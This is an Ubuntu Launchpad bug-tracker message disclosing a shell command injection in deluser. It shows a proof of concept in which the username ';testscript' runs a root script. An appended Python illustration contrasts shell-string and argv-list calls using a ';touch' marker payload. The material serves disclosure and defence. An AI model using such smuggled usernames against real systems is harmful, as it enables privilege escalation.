[Bug 1838489] Re: adduser & deluser shell command injection
Haoxi Tan
1838489 at bugs.launchpad.net
Tue Sep 17 13:32:38 UTC 2019
Hi,
I have reported this bug to Debian:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577
Warm regards,
Haoxi
On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <marc.deslauriers at canonical.com> wrote:
> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
> Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1838489
>
> Title:
> adduser & deluser shell command injection
>
> Status in adduser package in Ubuntu:
> Incomplete
>
> Bug description:
> deluser program is vulnerable to a command injection vulnerability
> when a user is added via adduser with special characters (such as
> ';'). It is only possible when the user exists on the system (adduser
> does not prevent usernames with ';' from being added.)
>
> This can be a security risk when user accounts on the system can be
> created from arbitrary input, and there are exploitable programs in
> PATH to make privilege escalation possible.
>
> -------------- Proof of concept ----------------
>
> # ll /test-file
> ls: cannot access '/test-file': No such file or directory
>
> # cat /usr/bin/testscript
> #!/bin/bash
> touch /test-file
>
> # deluser
> Enter a user name to remove: ;testscript
> no crontab for root
> crontab: usage error: no arguments permitted after this option
> usage: crontab [-u user] file
> crontab [ -u user ] [ -i ] { -e | -l | -r }
> (default operation is replace, per 1003.2)
> -e (edit user's crontab)
> -l (list user's crontab)
> -r (delete user's crontab)
> -i (prompt before deleting user's crontab)
> /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.
> (failed reverse-i-search)`': deluser^C
> # ll /test-file
> -rw------- 1 root root 0 Jul 31 10:25 /test-file
>
>
> -------- system description --------
>
> Description: Ubuntu 18.04.2 LTS
> Release: 18.04
>
> # apt-cache policy adduser
> adduser:
> Installed: 3.116ubuntu1
> Candidate: 3.116ubuntu1
> Version table:
> *** 3.116ubuntu1 500
> 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
> 100 /var/lib/dpkg/status
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions
>
** Bug watch added: Debian Bug tracker #940577
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577
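The following is an added illustration and is not part of this bug report, of the reporter's PoC, or of the adduser package's own code. It reproduces the class of bug the PoC demonstrates: the error line `/usr/bin/crontab -r ;testscript' returned error code 1` shows the username being interpolated into a single command string that a shell then parses, so ';' terminates the crontab invocation and the rest of the "username" runs as a second command with deluser's (root) privileges. The example runs the same ';touch <marker>' trick against a shell-string call and against an argv-list call, and checks a username against the default NAME_REGEX shipped in /etc/adduser.conf. Assumptions: the stand-in program `true` replaces crontab so nothing real is modified, the function names are invented for this demo, and the NAME_REGEX value is the documented default, not necessarily what the reporter's system had configured (the report does not say whether --force-badname was used).

```python
import os
import re
import subprocess
import tempfile

# Default NAME_REGEX from /etc/adduser.conf (assumption: quoted from the
# shipped config; the reporter's host may have had a looser setting or
# used --force-badname, which the bug report does not state).
NAME_REGEX = re.compile(r"^[a-z][-a-z0-9_]*$")


def is_safe_username(user: str) -> bool:
    """True when the name passes adduser's default NAME_REGEX check."""
    return NAME_REGEX.match(user) is not None


def remove_crontab_vulnerable(user: str, crontab: str = "true") -> int:
    """Mimics the unsafe pattern behind the PoC: the username is pasted into
    one command string that /bin/sh parses, so ';' ends the crontab command
    and whatever follows runs as a separate command.  `crontab` defaults to
    the harmless `true` so this demo never touches a real crontab."""
    cmd = f"{crontab} -r {user}"
    return subprocess.run(cmd, shell=True).returncode


def remove_crontab_fixed(user: str, crontab: str = "true") -> int:
    """Same call with an argv list and no shell: the username reaches the
    program as one argument, metacharacters included, and is never parsed."""
    return subprocess.run([crontab, "-r", user]).returncode


def injection_succeeds(remove_crontab) -> bool:
    """Run one variant with a ';touch <marker>' username (the PoC's
    ';testscript' with the script inlined) and report whether the injected
    touch actually ran, i.e. whether the marker file now exists."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "test-file")
        remove_crontab(f";touch {marker}")
        return os.path.exists(marker)


if __name__ == "__main__":
    print("shell string:", injection_succeeds(remove_crontab_vulnerable))  # True
    print("argv list:   ", injection_succeeds(remove_crontab_fixed))       # False
    print("NAME_REGEX:  ", is_safe_username(";testscript"))                # False
```

The argv form is the fix to prefer over quoting the name into a shell string, because it removes the shell from the path entirely; the regex check is defence in depth for callers that create accounts from external input. Note also that the truncated `/usr/bin/crontab -r` in the PoC ran with no username, so the `no crontab for root` line suggests it acted on the invoking root user's own crontab; on a host where root has one, the truncated command itself would remove it.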